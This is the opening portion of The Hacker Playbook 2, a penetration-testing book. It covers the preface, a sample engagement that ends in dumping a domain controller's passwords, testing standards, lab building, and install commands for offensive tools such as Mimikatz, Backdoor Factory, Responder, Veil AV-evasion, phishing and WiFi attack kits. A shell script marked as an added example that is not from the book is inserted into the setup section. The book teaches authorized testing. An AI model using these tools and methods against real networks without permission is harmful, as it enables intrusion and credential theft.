Preface 


This is the second iteration of The Hacker Playbook (THP). For those that read the first book, this is 
an extension of that book. Below is an overview of all of the new vulnerabilities and attacks that will 
be discussed. In addition to the new content, attacks and techniques from the first book, which are still 
relevant today, are included to eliminate the need to refer back to the first book. So, what’s new? 
Some of the updated attacks from the last year and a half include: 

• Heartbleed 
• ShellShock 
• Kerberos issues (Golden Ticket/Skeleton Key) 
• PTH Postgres 
• New Spear Phishing 
• Better/Cheaper Dropboxes 
• Faster/Smarter Password Cracking 
• New WIFI attacks 
• Tons of PowerShell scripts 
• Privilege Escalation Attacks 
• Mass network compromises 
• Moving laterally smarter 
• Burp Modules 
• Printer Exploits 
• Backdoor Factory 
• ZAP Proxy 
• Sticky Keys 
• NoSQL Injection 
• Commercial Tools (Cobalt Strike, Canvas, Core Impact) 
• Lab sections 
• And so much more 


In addition to describing the attacks that have changed in the last couple years, I have attempted to 
incorporate all of the comments and recommendations received from readers of the first book into this 
second book. A more in-depth look into how to set up a lab environment in which to test your attacks 
is also given, along with the newest tips and tricks of penetration testing. Lastly, I tried to make this 
version easier to follow since many schools have incorporated my book into their curricula. 
Whenever possible, I have added lab sections that help provide a way to test a vulnerability or 
exploit. 


What's not different? One of my goals from the first book was to make this as “real world" as 
possible. I really tried to stay away from theoretical attacks and focused on what I have seen from 
personal experience and what actually worked. The second goal was to strengthen your core 
understanding as a penetration tester. In other words, I wanted to encourage you to use different 
methods to boost your value to your current or future company or client. Just running a vulnerability 
scanner and submitting that as your report provides no real benefit to a company. Also, penetration 
tests with an extremely limited scope will give a false sense of security. To THP1 readers, rest 
assured that although you may find some familiar information, there is a great deal of new information 
in THP2, which has double the content compared to its predecessor. Additionally, by popular 
demand, I have created a slew of scripts and tools to help you in your hacking adventure. This was 
probably one of the top requests by readers, so I have included a ton of scripts located in my Github 
(https://github.com/cheetz) and tried to make it easier to follow. 


For those who did not read the first book, you might be wondering what experience I have as a 
penetration tester. My background comes from eight years of penetration testing for major financial 
institutions, large utility companies, Fortune 500 entertainment companies, and government 
organizations. I have also spent years teaching offensive network security, spoken at 
Toorcon/Derbycon/BayThreat, been referenced in many security publications, and currently run a 
security community of over 300 members in Southern California. My hope is that you will be able to 
take what I have learned and incorporate it into your own security lifestyle. 


From a technical standpoint, many tools and attacks have changed in the past couple years. With 
attacks like pass-the-hash, and with Group Policy Preferences getting patched, the process and 
methods of attackers have changed. 


One important note is that I am using both commercial tools and open source. For every commercial 
tool, I try to give an open source counterpart. I occasionally run into some pentesters that say they 
only use open source tools. As a penetration tester, I find this a hard statement to take. If you are 
supposed to emulate a “real world” attack, and the “bad guys” do not have these restrictions, then you 
need to use any tool that works to get the job done. 


Who is this book intended for? You need to have some experience with Microsoft Active Directory, a 
solid understanding of Linux, some networking background, some coding experience (Bash, Python, 
Perl, Ruby, PHP, C, or anything along that line), and using security tools like vulnerability scanners 
and exploit tools (i.e. Metasploit). If you don't have the background, but are interested in getting into 
security, I would suggest making sure you have the basics down. You can’t just jump into security 
without the basic knowledge of how things work first. 


This book is not just for those looking to get into or who currently are in the offensive fields. This 
book provides valuable information and insight for incident responders as well, as they need to know 
how attackers think and what methods they use. 


Lastly, I want to discuss a bit about the difference between researchers and penetration testers. Many 
times, these two professions blend together, as both need to be knowledgeable in both areas. 
However, in this book, I separate the two areas slightly and focus on penetration testing. To clarify, in 
this book, a researcher is one who focuses on a single or limited scope and spends more time 
reversing the application/protocol/OS. Their goal is to discover an unknown exploit for that 
particular vulnerability. On the other hand (and remember this is a generalization), a penetration 
tester takes what is already known to compromise systems and applications. There will always be 
some overlap: a pentester will still fuzz vulnerabilities (for example, web parameters) and find 
zero-days, but he/she might not spend as much time finding all the issues as a researcher might. 


Last Notes and Disclaimer 


This book is not going to turn you into some sort of super hacker. It takes a lot of practice, research, 
and a love for the game. This book will hopefully make you think outside the box, become more 
creative, and help grow your understanding of flaws that occur in systems. 


Just remember, ONLY test systems on which you have written permission. Just Google the term 
“hacker jailed" and you will see plenty of different examples where young teens have been sentenced 
to years in prison for what they thought was a “fun time." There are many free platforms where legal 
hacking is allowed and will help you further educate yourself. 


Introduction 


You have been hired as a penetration tester for a large industrial company called Secure Universal 
Cyber Kittens, Inc. or SUCK, for short. They are developing future weapons to be used by the highest 
bidder and you have been given the license to kill...okay, maybe not kill, but the license to hack. This 
authorization gives you full approval to use any tactic in your arsenal to try to break into and steal the 
company’s trade secrets. 


As you pack your laptop, drop boxes, rubber duckies, Proxmarks, and cables, you almost forget the 
most important thing...The Hacker Playbook 2 (THP). You know that THP will help get you out of 
some of the stickiest situations. Your mind begins hazing back to your last engagement... 


After cloning some badges and deploying your drop box on the network, you run out of the office, 
barely sneaking past the security guards. Your drop box connects back to your SSH server and now 
you are on their network. You want to stay pretty quiet on the network and not trigger any IDS 
signatures. What do you look for? You flip to the Before the Snap chapter and remember printers! 
You probe around for a multifunction printer and see that it is configured with default passwords. 
Great! You re-configure LDAP on the printer, set up your netcat listener, and obtain Active Directory 
credentials. Since you don’t know what permissions these credentials have, you try to psexec to a 
Windows machine with a custom SMBexec payload. The credentials work and you are now a regular 
user. After a couple tricks with PowerTools in the Lateral Pass section, you move to local admin and 
pull passwords from memory with Mimikatz. Phew... you sigh... this is too easy. After pulling 
passwords for a few accounts, you find where the domain admins (DA) are and connect to their boxes 
to pull passwords again. With domain admin creds, it is pretty straightforward to dump the Domain 
controller (DC) with psexec_ntdsgrab and then clear your tracks... 


Glad you didn’t forget your copy of THP! 


Standards 


Before we can dive into THP, we need to understand some of the basics and standards used for 
penetration testing. This will be the foundation for recon, finding and exploiting vulnerabilities, and 
reporting. There really is no right way to perform an engagement, but you will need to at least cover 
the basics. 


The Penetration Testing Execution Standard 
(PTES - http://www.pentest-standard.org/index.php): 


PTES is the current standard for performing penetration tests. These are referenced regularly and are 
the core elements in what goes on in an engagement. I highly recommend that you go through the entire 
PTES technical guideline as it is full of detailed information. The standard accepted model consists 
of seven main sections: 

1. Pre-engagement Interactions 
2. Intelligence Gathering 
3. Threat Modeling 
4. Vulnerability Analysis 
5. Exploitation 
6. Post Exploitation 
7. Reporting 


One thing I encourage you to do is to be creative and find what works for you. For me, although the 
PTES framework is a great model for performing penetration tests, I like taking penetration tests and 
tweaking the standard model. From experience, the standard I would typically use would look 
something like the following: 

1. Intelligence Gathering 
2. Initial Foothold 
3. Local/Network Enumeration 
4. Local Privilege Escalation 
5. Persistence 
6. Lateral Movement 
7. Domain Privilege Escalation 
8. Dumping Hashes 
9. Data Identification/Exfiltration 
10. Reporting 

This breakdown shows what I would perform and focus on during a penetration test. After the initial 
foothold via social engineering, the focus is to acquire a privileged account. To get there, you have to 
enumerate the system/network and look for misconfigurations or local vulnerabilities. We also need 
to implement persistence, just in case we end up losing our shells. Once at a system or elevated 
account, we need to see if we can acquire a domain-privileged account. To do this, we need to 
compromise other boxes to eventually get to a domain admin (DA) account. At a domain controller 
(DC), the best part of the test is to dump the domain hashes and take a quick break for a happy dance. 
This test should not end here. Where customer value really comes into play is going after sensitive 
data, especially personally identified information (PII), intellectual property (IP), or other 
information requested by the client. Lastly, since we all know that reporting pays the bills, having a 
good standard template and valuable data will set you apart from the competition. 


Of course, this was all a very quick and high-level example of what can occur during an assessment. 
To guide you through this process, I have tried to develop a format to help you on your path. The 
Hacker Playbook is setup with 11 different sections, laid out as a football playbook. But, do not 
worry, you don’t necessarily need to know the football terms in detail to follow along. Here is the 
breakdown: 


• Pregame: This is all about how to set up your lab, attacking machines, and the tools 
we will use throughout the book. 
• Before the Snap: Before you can run any plays, you need to scan your environment 
and understand what you are up against. We will dive into discovery and smart 
scanning. 
• The Drive: Take the vulnerabilities which were identified from Before the Snap 
and start exploiting those systems. This is where we get our hands a little dirty and 
start exploiting boxes. 
• The Throw: Sometimes you need to get creative and look for the open target. We 
will take a look at how to find and exploit manual web application findings. 
• The Lateral Pass: After you have compromised a system, we will discuss ways to 
move laterally through the network. 
• The Screen: A play typically used to trick the enemy. This chapter will explain 
social engineering tactics. 
• The Onside Kick: A deliberately short kick that requires close distance. Here, I will 
describe attacks that require physical access. 
• The Quarterback Sneak: When you only need a couple of yards, a quarterback sneak 
is perfect. Sometimes you will get stuck with antivirus (AV); this chapter describes 
how to get over those small hurdles by evading AV. 
• Special Teams: Cracking passwords, exploits, NetHunter and some tricks. 
• Two-Minute Drill: You have only two minutes on the clock and you need to go from 
no access to full domain admin. 
• Post-Game Analysis: Reporting your findings. 


Updates 


As we all know, security changes quickly and things break all the time. I try to keep up with all of the 
changes and any requests you might have. You can find updates here: 


Subscribe for Book Updates: 


http://thehackerplaybook.com/subscribe 
Twitter: @HackerPlaybook 
URL: http://TheHackerPlaybook.com 


Github: https://www.github.com/cheetz 
Email: book@thehackerplaybook.com 


Pregame - The Setup 


Before we can start attacking Secure Universal Cyber Kittens, Inc. (SUCK), we need to build our 
testing lab to test our attacks, develop our attacking machines, and understand how our exploits work. 
Practice and testing are invaluable when it comes to running a full scale attack. You don’t want to be 
the average Joe on a test using untested exploits which inadvertently takes down a critical system, 
getting you identified and tossed out of the company. 


Building A Lab 


It might be hard to build a full lab with all the applications, operating systems, and network 
appliances, but you need to make sure you have the core components. These include basic Linux 
servers and Windows systems. 

Since Microsoft Windows operating systems aren’t free, you may have to purchase some software. If 
you are a student, you can generally get free software through your school. You can also check 
Microsoft DreamSpark (https://www.dreamspark.com/) to see if you qualify. I think with a default 
.edu email address you can get Windows 2012 and other software for free. 


Building Out A Domain 


Practicing on a Microsoft Active Directory (AD) environment is good; however, one of the best ways 
to learn is to build one yourself. Knowing how and why things work on an AD environment will help 
you later on in life. I have put together condensed step-by-step instructions on how to set up an AD 
domain controller that should get you up and running. For those who have never built a DC and client 
before, I highly recommend you do this first. Before you can really understand what you are attacking, 
you need to understand how it works. 


In the example provided below, I will install a Windows Domain Environment using Windows 2012 
R2, Windows 8 and Windows 7. In this book, I wanted to focus on the newer operating systems. 
However, if you are looking to test older exploits, you may want to consider installing Windows XP 
SP2. Check out my Active Directory installation guide here: 


http://www.thehackerplaybook.com/Windows_Domain.htm 


Building Out Additional Servers 


Below are the vulnerable virtual machines I recommend. Many of the labs in this book will use these 
two frameworks for testing. For your own practice, you should look at the other test servers 
mentioned at the end of this book. 


Metasploitable2 
This is a great vulnerable Ubuntu Linux virtual machine that intentionally contains common 
vulnerabilities. This is great for testing security tools, such as Metasploit, and demonstrating common 
attacks. It is relatively easy to set up as you just need to download the virtual machine (VM) and boot 
it in a Virtual Platform. 

• http://sourceforge.net/projects/metasploitable/files/Metaspl: 


OWASPBWA (OWASP Broken Web Applications Project) 
While Metasploitable2 focuses on services, OWASPBWA is a great collection of vulnerable web 
applications. This is one of the most complete vulnerable web application collections in a single VM. 
This VM will be used for many of the web examples throughout the book. As with Metasploitable2, 
just download the vulnerable VM and boot it up. 

• http://sourceforge.net/projects/owaspbwa/files/ 


Practice 


Penetration testing is like any other profession and needs to be second nature. Every test is 
completely different and you need to be able to adapt with the changing environment. Without 
adequate practice, trying multiple different tools, and exploiting systems using different payloads, you 
won’t be able to adapt if you ever run into a brick wall. 


Building Your Penetration Testing Box 


In The Hacker Playbook One book, I received some comments on why I have you build and install 
the tools instead of creating one script to automate it all. The main reason I have my readers manually 
go through these steps is because these are extremely important tools and this will help you remember 
what is available in your own arsenal. Kali Linux, for example, has tons of tools and is well- 
organized, but if you don’t know the tool is installed or you haven’t played around with the individual 
attacks, then it won't really be helpful in that dire need situation. 


Setting Up A Penetration Testing Box 


If you set up your box from the first book, you can breeze over this section. As you know, I always 
like bringing two different laptops to an engagement. The first is a Windows box and the second is 
either an OS X or Linux host. The reason I bring two laptops is because I have been on penetration 
tests where, on very specific networks, the OS X host would not connect to the network. Instead of 
spending hours trying to figure out why, I just started all of my attacks and scanning from my 
Windows host and fixed the OS X issue during any free time. I cannot tell you the countless times 
having two laptops has saved me. 


It doesn’t matter if you run Windows, OS X, or some Linux flavor on your base system, but there are a 
few musts. First, you need to install a Virtual Machine (VM) platform. You can use Virtual Box 
(https://www.virtualbox.org) or VMWare Player (https://my.vmware.com/web/vmware/downloads) 
or any others of your choice. Both are free on Windows and only Virtual Box on OS X is free. I 
would highly recommend getting the commercial versions for your VM platform as they have a wealth 
of extra features, such as encryption, snapshots, and much better VM management. 


Since we are going to install most of our tools on our VMs, the most important step is to keep your 
base system clean. Try not to even browse personal sites on the base image. This way, your base 
system is always clean and you won’t ever bring malware onto a client site (I have seen this many 
times before), or have unknown vulnerable services listening. After configuring my hosts, I snapshot 
the virtual machine at the clean and configured state. This way, for any future tests, all I need to do is 
revert back to the baseline image, patch and update tools, and add any additional tools I need. Trust 
me, this tactic is a lifesaver. I can't count the number of past assessments where I spent way too much 
time setting up a tool that should have already been installed. 


Hardware 


Penetration Testing Laptop 
For your basic penetration laptop requirements, they haven’t changed much from the previous book. 


Basic recommendations: 
• Laptop with at least 8GB of RAM 
• 500GB hard drive (solid state is highly recommended) 
• Intel Quad Core i7 Processor 


Password Cracking Desktop 
This is completely optional, but with the number of tests where I have compromised hashes, faster 
password cracking equipment was required. Although you could purchase some crazy rig with 8 
GPUs that runs on a Celeron processor, I have built a multi-purpose box with plenty of space and 
amazing password cracking power. Later in the book, I will go over the actual specs and tools I built 
out for password cracking and the reasons why I went this route. 


Password Cracking/Multi-purpose Hacking Box 


• Case: CORSAIR Vengeance C70 
• Video Card: SAPPHIRE 100360SR Radeon R9 295x2 8GB GDDR5 
• Hard Drive: SAMSUNG 840 EVO MZ-7TE500BW 2.5" 500GB SATA III TLC Internal SSD 
• Power Supply: SILVERSTONE ST1500 1500W ATX 
• RAM: CORSAIR Vengeance Pro 16GB (2 x 8GB) 240-Pin DDR3 SDRAM DDR3 1600 
• CPU: CORE I7 4790K 4.0G 
• Motherboard: ASUS MAXIMUS VII FORMULA 
• CPU Cooler: Cooler Master Hyper 212 EV 

This is definitely overkill for just password cracking, since the only thing that really matters are the 
GPUs; but, again, I still wanted to use this as an additional system in my arsenal. 


Open Source Versus Commercial Software 


In this book, I thought it would be beneficial to include a comparison of open source and commercial 
software. Although not everyone has the funds to purchase commercial software, it is very important 
to know what is available and what an attacker might use. Both as a defender and someone who runs 
offensive plays, having the right tools can definitely make the difference. In this book, I will show you 
several different commercial software tools that I find very useful, which can assist in various types 
of offensive situations. With every commercial software, I will try to provide an open source 
companion, but it may not always be available. 


Commercial Software in The Hacker Playbook 2 
• Burp Suite Pro 
• Canvas 
• Cobalt Strike 
• Core Impact 
• Nessus 
• Nexpose 


Kali Linux 
(https://www.kali.org/) 


For those who have never used Kali Linux, it is often seen as the standard in offensive penetration 
testing. This Debian-based Linux distro contains a wealth of different security tools all preconfigured 
into a single framework. This is a great starting point for your offensive security platform and the 
book mainly builds off of this Linux distribution. I highly recommend that you download the virtual 
machine and use this for your testing. 


Back Box 
(http://www.backbox.org/) 


Although Kali Linux is seen as the standard, it is best to not ever rely on a single tool/OS/process— 
this will be a constant theme throughout the book. The developers could stop supporting a certain tool 
or, even worse, you begin to experience tunnel vision and rely on old methods. The guys over at Back 
Box are doing great work building and supporting another security platform. The main differences I 
can see are that Back Box is based on Ubuntu and, more importantly, comes with default user rights 
management (instead of everyone running as root in Kali Linux). Some people are more comfortable 
with Ubuntu and I have gotten into situations where specific tools are developed for and run more 
stable on Ubuntu versus Kali. Again, it should be just another tool available at your reach and it is 
good to know what is out there. 


Setting Up Your Boxes 


There are many tools that are not included or that need to be modified from the stock tool set in any of 
the security distributions (distro). I like to put them in a directory where I know where they exist and 
can be used easily. Here are the tools that you will need to install. 


Recon/Scanning Tools 
• Discover 
• EyeWitness 
• HTTPScreenShot 
• WMAP 
• SpiderFoot 
• Masscan 
• Gitrob 
• CMSmap 
• Recon-ng 
• SPARTA 
• WPScan 
• Password Lists 

Exploitation 
• Burp Suite Pro 
• ZAP Proxy Pro 
• NoSQLMap 
• SQLMap 
• SQLNinja 
• BeEF Exploitation Framework 
• Responder 
• Printer Exploits 
• Veil 
• WIFIPhisher 
• Wifite 
• SET 

Post Exploitation 
• Hacker Playbook 2 - Custom Scripts 
• SMBexec 
• Veil 
• WCE 
• Mimikatz 
• PowerSploit 
• Nishang 
• The Backdoor Factory 
• DSHashes 
• Net-Creds 


Setting Up Kali Linux 


There are many different ways you can set up your attacker host, but I want you to be able to mimic 
all of the examples in this book. Before going on, you should try to configure your host with the 
settings below. Remember that tools do periodically change and that you might need to make small 
tweaks to these settings or configurations. (Don't forget to check the updates page at 
http://www.thehackerplaybook.com). For those users that have only purchased the physical book, I 
have copied the whole settings and software section to my Github 
(http://www.github.com/cheetz/thp2). This should make copying and pasting much easier, so you 
don’t have to type each command in by hand. 


Since this book is based off of the Kali Linux platform, you can download the Kali Linux distro from: 
http://www.kali.org/downloads/. I highly recommend you download the VMware image 
(https://www.offensive-security.com/kali-linux-vmware-arm-image-download/) and download 
VMware Player/VirtualBox. Remember that it will be a gz-compressed and tar archived file, so make 
sure to extract them first and load the vmx file. 


Once Your Kali VM is Up and Running 
• Log in with the username root and the default password toor 
• Open a terminal 
• Change the password 
  ○ passwd 
• Update the image 
  ○ apt-get update 
  ○ apt-get dist-upgrade 
• Setup Metasploit database 
  ○ service postgresql start 
• Make postgresql database start on boot 
  ○ update-rc.d postgresql enable 
• Start and stop the Metasploit service (this will setup the database.yml file for you) 
  ○ service metasploit start 
  ○ service metasploit stop 
• Install gedit 
  ○ apt-get install gedit 
• Change the hostname - Many network admins look for systems named Kali in logs 
like DHCP. It is best to follow the naming standard used by the company you are 
testing 
  ○ gedit /etc/hostname 
    ■ Change the hostname (replace kali) and save 
  ○ gedit /etc/hosts 
    ■ Change the hostname (replace kali) and save 
  ○ reboot 
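The setup steps above collected into one script, as an added example that is not from the book or its Github. The apt-get, service and update-rc.d commands are the book's own and assume a stock Kali image of that era run as root; the hostname rename is written as a function that takes the two files as parameters so it can be tried on copies (and rejects a malformed name) before it touches the real /etc/hostname and /etc/hosts. The host name ws-fin-042 is a constructed placeholder. 

```shell
#!/bin/sh
# Added example (not from the book): baseline a fresh Kali VM in one pass.
# Usage, as root on the VM:  sh kali-baseline.sh apply ws-fin-042
set -eu

# Rename the host in both files. The name must be a valid RFC 1123 label
# (letters, digits, hyphens, no leading/trailing hyphen, <= 63 chars) so a typo
# cannot leave the VM with an unresolvable name. Paths are parameters so the
# function can be exercised on copies first.
rename_host() {
    new="$1"; hostname_file="$2"; hosts_file="$3"
    case "$new" in
        ''|*[!A-Za-z0-9-]*|-*|*-)
            echo "invalid hostname: '$new'" >&2; return 1 ;;
    esac
    [ "${#new}" -le 63 ] || { echo "hostname too long: $new" >&2; return 1; }
    old=$(head -n 1 "$hostname_file")
    [ -n "$old" ] || { echo "empty $hostname_file" >&2; return 1; }
    printf '%s\n' "$new" > "$hostname_file"
    # Replace only whole-word occurrences of the old name (the 127.0.1.1 line).
    sed -i "s/\b$old\b/$new/g" "$hosts_file"
}

# Post-check: new name is the first line of hostname_file and appears in
# hosts_file; the old name no longer appears in hosts_file. Returns 0 if so.
rename_ok() {
    new="$1"; old="$2"; hostname_file="$3"; hosts_file="$4"
    [ "$(head -n 1 "$hostname_file")" = "$new" ] || return 1
    grep -qw -- "$new" "$hosts_file" || return 1
    if grep -qw -- "$old" "$hosts_file"; then return 1; fi
    return 0
}

# The remaining book steps, in order, for a fresh Kali image. Needs root.
baseline() {
    passwd root                                  # replace the default "toor"
    apt-get update && apt-get -y dist-upgrade
    apt-get -y install gedit
    service postgresql start                     # Metasploit database
    update-rc.d postgresql enable                # start it on boot
    service metasploit start && service metasploit stop   # writes database.yml
    rename_host "$1" /etc/hostname /etc/hosts
    rename_ok "$1" kali /etc/hostname /etc/hosts || echo "check /etc/hosts by hand" >&2
    echo "hostname set to $1; reboot to apply"
}

case "${1:-}" in
    apply) baseline "${2:?usage: $0 apply <new-hostname>}" ;;
esac
```

Nothing runs until the script is invoked with apply, so it can be sourced or dry-run to test rename_host on scratch copies of the two files before it is pointed at the real ones. 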


• *Optional for Metasploit - Enable Logging 
  ○ I list this as optional since logs get pretty big, but you have the ability 
to log every command and result from Metasploit’s Command Line 
Interface (CLI). This becomes very useful for bulk attack/queries or if 
your client requires these logs. *If this is a fresh image, type 
msfconsole first and exit before configuring logging to create the .msf4 
folder. 
  ○ From a command prompt, type: 
    ■ echo "spool /root/msf_console.log" > /root/.msf4/msfconsole.rc 
  ○ Logs will be stored at /root/msf_console.log 


Tool Installation 
The Backdoor Factory: 
• Patch PE, ELF, Mach-O binaries with shellcode. 
• git clone https://github.com/secretsquirrel/the-backdoor-factory /opt/the-backdoor-factory 
• cd /opt/the-backdoor-factory 
• ./install.sh 


HTTPScreenShot 
• HTTPScreenshot is a tool for grabbing screenshots and HTML of large numbers of 
websites. 
• pip install selenium 
• git clone https://github.com/breenmachine/httpscreenshot.git /opt/httpscreenshot 
• cd /opt/httpscreenshot 
• chmod +x install-dependencies.sh && ./install-dependencies.sh 
• HTTPScreenShot only works if you are running on a 64-bit Kali by default. If you 
are running 32-bit PAE, install i686 phantomjs as follows: 
  ○ wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-i686.tar.bz2 
  ○ bzip2 -d phantomjs-1.9.8-linux-i686.tar.bz2 
  ○ tar xvf phantomjs-1.9.8-linux-i686.tar 
  ○ cp phantomjs-1.9.8-linux-i686/bin/phantomjs /usr/bin/ 


SMBExec 
• A rapid psexec style attack with samba tools. 
• git clone https://github.com/pentestgeek/smbexec.git /opt/smbexec 
• cd /opt/smbexec && ./install.sh 
• Select 1 - Debian/Ubuntu and derivatives 
• Select all defaults 
• ./install.sh 
• Select 4 to compile smbexec binaries 
• After compilation, select 5 to exit 


Masscan 
• This is the fastest Internet port scanner. It can scan the entire Internet in under six 
minutes. 
• apt-get install git gcc make libpcap-dev 
• git clone https://github.com/robertdavidgraham/masscan.git /opt/masscan 
• cd /opt/masscan 
• make 
• make install 


Gitrob 
• Reconnaissance tool for GitHub organizations 
• git clone https://github.com/michenriksen/gitrob.git /opt/gitrob 
• gem install bundler 
• service postgresql start 
• su postgres 
• createuser -s gitrob --pwprompt 
• createdb -O gitrob gitrob 
• exit 
• cd /opt/gitrob/bin 
• gem install gitrob 

CMSmap 
• CMSmap is a python open source CMS (Content Management System) scanner that 
automates the process of detecting security flaws 
• git clone https://github.com/Dionach/CMSmap /opt/CMSmap 


WPScan 
• WordPress vulnerability scanner and brute-force tool 
• git clone https://github.com/wpscanteam/wpscan.git /opt/wpscan 
• cd /opt/wpscan && ./wpscan.rb --update 


Eyewitness 
• EyeWitness is designed to take screenshots of websites, provide some server 
header info, and identify default credentials if possible. 
• git clone https://github.com/ChrisTruncer/EyeWitness.git /opt/EyeWitness 


Printer Exploits 
• Contains a number of commonly found printer exploits 
• git clone https://github.com/MooseDojo/praedasploit /opt/praedasploit 


SQLMap 
• SQL Injection tool 
• git clone https://github.com/sqlmapproject/sqlmap /opt/sqlmap 


Recon-ng 
• A full-featured web reconnaissance framework written in Python 
• git clone https://bitbucket.org/LaNMaSteR53/recon-ng.git /opt/recon-ng 


Discover Scripts 
• Custom bash scripts used to automate various pentesting tasks. 
• git clone https://github.com/leebaird/discover.git /opt/discover 
• cd /opt/discover && ./setup.sh 


BeEF Exploitation Framework 
• A cross-site scripting attack framework 
• cd /opt/ 
• wget https://raw.github.com/beefproject/beef/a6a7536e/install-beef 
• chmod +x install-beef 
• ./install-beef 


Responder 
• A LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP 
rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security 
NTLMSSP and Basic HTTP authentication. Responder will be used to gain NTLM 
challenge/response hashes 
• git clone https://github.com/SpiderLabs/Responder.git /opt/Responder 


The Hacker Playbook 2 - Custom Scripts 
• A number of custom scripts written by myself for The Hacker Playbook 2. 
• git clone https://github.com/cheetz/Easy-P.git /opt/Easy-P 
• git clone https://github.com/cheetz/Password_Plus_One /opt/Password_Plus_One 
• git clone https://github.com/cheetz/PowerShell_Popup /opt/PowerShell_Popup 
• git clone https://github.com/cheetz/icmpshock /opt/icmpshock 
• git clone https://github.com/cheetz/brutescrape /opt/brutescrape 
• git clone https://www.github.com/cheetz/reddit_xss /opt/reddit_xss 


The Hacker Playbook 2 - Forked Versions 
• Forked versions of PowerSploit and PowerTools used in the book. Make sure you 
clone your own repositories from the original sources. 
• git clone https://github.com/cheetz/PowerSploit /opt/HP_PowerSploit 
• git clone https://github.com/cheetz/PowerTools /opt/HP_PowerTools 
• git clone https://github.com/cheetz/nishang /opt/nishang 


DSHashes: 
• Extracts user hashes in a user-friendly format for NTDSXtract 
• wget http://ptscripts.googlecode.com/svn/trunk/dshashes.py -O /opt/NTDSXtract/dshashes.py 


SPARTA: 
• A python GUI application which simplifies network infrastructure penetration 
testing by aiding the penetration tester in the scanning and enumeration phase. 
• git clone https://github.com/secforce/sparta.git /opt/sparta 
• apt-get install python-elixir 
• apt-get install ldap-utils rwho rsh-client x11-apps finger 


NoSQLMap 
• An automated pentesting toolset for MongoDB database servers and web 
applications. 
• git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap 


Spiderfoot
• Open Source Footprinting Tool
• mkdir /opt/spiderfoot/ && cd /opt/spiderfoot
• wget http://sourceforge.net/projects/spiderfoot/files/spiderfoot-2.3.0-src.tar.gz/download
• tar xzvf download
• pip install lxml
• pip install netaddr
• pip install M2Crypto
• pip install cherrypy
• pip install mako


WCE
• Windows Credential Editor (WCE) is used to pull passwords from memory
• Download from: http://www.ampliasecurity.com/research/windows-credentials-editor/ and save to /opt/. For example:
    o wget www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
    o mkdir /opt/wce && unzip wce_v1* -d /opt/wce && rm wce_v1*.zip


Mimikatz
• Used for pulling cleartext passwords from memory, Golden Ticket, skeleton key and more
• Grab the newest release from https://github.com/gentilkiwi/mimikatz/releases/latest
    o cd /opt/ && wget http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
    o unzip -d ./mimikatz mimikatz_trunk.zip


SET
• Social Engineering Toolkit (SET) will be used for the social engineering campaigns
• git clone https://github.com/trustedsec/social-engineer-toolkit/ /opt/set/
• cd /opt/set && ./setup.py install


PowerSploit (PowerShell)
• PowerShell scripts for post exploitation
• git clone https://github.com/mattifestation/PowerSploit.git /opt/PowerSploit
• cd /opt/PowerSploit && wget https://raw.githubusercontent.com/obscuresec/random/master/StartListener.py && wget https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_encodei[...]


Nishang (PowerShell)
• Collection of PowerShell scripts for exploitation and post exploitation
• git clone https://github.com/samratashok/nishang /opt/nishang


Veil-Framework
• A red team toolkit focused on evading detection. It currently contains Veil-Evasion for generating AV-evading payloads, Veil-Catapult for delivering them to targets, and Veil-PowerView for gaining situational awareness on Windows domains. Veil will be used to create a python based Meterpreter executable.
• git clone https://github.com/Veil-Framework/Veil /opt/Veil
• cd /opt/Veil/ && ./Install.sh -c


Burp Suite Pro
• Web Penetration Testing Tool
• Download: http://portswigger.net/burp/proxy.html. I would highly recommend that you buy the professional version. It is well worth the $299 price tag.


ZAP Proxy Pro
• OWASP ZAP: An easy-to-use integrated penetration testing tool for discovering vulnerabilities in web applications.
• Download from: https://code.google.com/p/zaproxy/wiki/Downloads?tm=2
• *Included by default in Kali Linux (owasp-zap)


Fuzzing Lists (SecLists)
• These are lists to use with Burp to fuzz parameters
• git clone https://github.com/danielmiessler/SecLists.git /opt/SecLists


Password Lists
• For the different password lists, see the section: Special Teams - Cracking, Exploits, and Tricks


Net-Creds Network Parsing
• Parse PCAP files for usernames/passwords
• git clone https://github.com/DanMcInerney/net-creds.git /opt/net-creds


Installing Firefox Add-ons
• Web Developer Add-on: https://addons.mozilla.org/en-US/firefox/addon/web-developer/
• Tamper Data: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
• Foxy Proxy: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
• User Agent Switcher: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/


Wifite
• Attacks against WiFi networks
• git clone https://github.com/derv82/wifite /opt/wifite


WIFIPhisher
• Automated phishing attacks against WiFi networks
• git clone https://github.com/sophron/wifiphisher.git /opt/wifiphisher


Phishing (Optional):
• Phishing-Frenzy
    o git clone https://github.com/pentestgeek/phishing-frenzy.git /var/www/phishing-frenzy
• Custom List of Extras
    o git clone https://github.com/macubergeek/gitlist.git /opt/gitlist


*Remember to check http://thehackerplaybook.com/updates/ for any updates.


Windows VM 


I highly recommend you also configure a Windows 7/8 Virtual Machine. This is because I have been 
on many tests where an application will require Internet Explorer or a tool like Cain and Abel, which 
will only work on one operating system. Remember, all of the PowerShell attacks will require you to 
run the commands on your Windows hosts. The point is to always be prepared because you will save 
yourself a lot of time and trouble having multiple operating systems available. 


High-level tools list addition to Windows
• HxD (Hex Editor)
• Evade (Used for AV Evasion)
• Hyperion (Used for AV Evasion)
• Metasploit
• Nexpose/Nessus
• Nmap
• oclHashcat
• Cain and Abel
• Burp Suite Pro
• Nishang
• PowerSploit
• Firefox (Add-ons)
    o Web Developer Add-on
    o Tamper Data
    o Foxy Proxy
    o User Agent Switcher


Setting Up Windows 


Setting up a Windows common testing platform should help complement your Kali Linux host. 
Remember to change your host names, disable NetBios if you don’t need it, and harden these boxes as 
much as possible. The last thing you want is to get owned during an assessment. 


There isn't anything special that I set up on Windows, but usually I will install the following.


• HxD http://mh-nexus.de/en/hxd/
• Evade https://www.securepla.net/antivirus-now-you-see-me-now-you-dont
• Hyperion http://www.nullsecurity.net/tools/binary.html
    o Download/install a Windows Compiler http://sourceforge.net/projects/mingw/
    o Run "make" in the extracted Hyperion folder and you should have the binary.
